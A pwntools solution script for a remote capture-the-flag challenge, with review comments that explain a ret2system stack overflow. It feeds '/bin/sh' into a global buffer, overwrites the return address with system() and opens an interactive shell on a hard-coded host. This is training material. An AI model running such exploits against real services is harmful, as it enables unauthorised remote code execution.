好像会点了^v^
# Solution script for a remote 32-bit CTF challenge: it answers the
# "your name" prompt with a string, then sends an over-long answer to the
# "here:" prompt.
# NOTE(review): inferred from the hard-coded constants below -- for this to
# work the service must copy the second answer into a stack buffer without a
# length check, be built without a stack canary, and be loaded at fixed
# addresses (no PIE). A bounded read, -fstack-protector, or PIE with ASLR
# would each break the chain; confirm against the challenge binary.
from pwn import *

# Fixed addresses inside the target binary (32-bit, hence p32 below).
str_addr = 0x0804A080  # presumably the global buffer that receives the name
sys_addr = 0x08048420  # presumably the binary's entry for system() -- confirm

conn = remote("111.198.29.45", 55602)

# The name is presumably stored at str_addr and reused as the argument below.
# NOTE(review): these str arguments rely on pwntools' implicit encoding under
# Python 3; bytes literals would be consistent with the b'0' payload.
conn.sendlineafter("your name", "/bin/sh")

# 0x26 + 0x4 filler bytes: presumably the distance from the buffer to the
# saved frame pointer, plus the 4-byte saved frame pointer itself.
filler = b'0' * (0x26 + 0x4)

# Three 32-bit words follow the filler: the value that lands on the saved
# return address, a dummy return address for the callee, and its argument.
frame = p32(sys_addr) + p32(0) + p32(str_addr)
payload = filler + frame
print(len(payload))

conn.sendlineafter("here:", payload)
conn.interactive()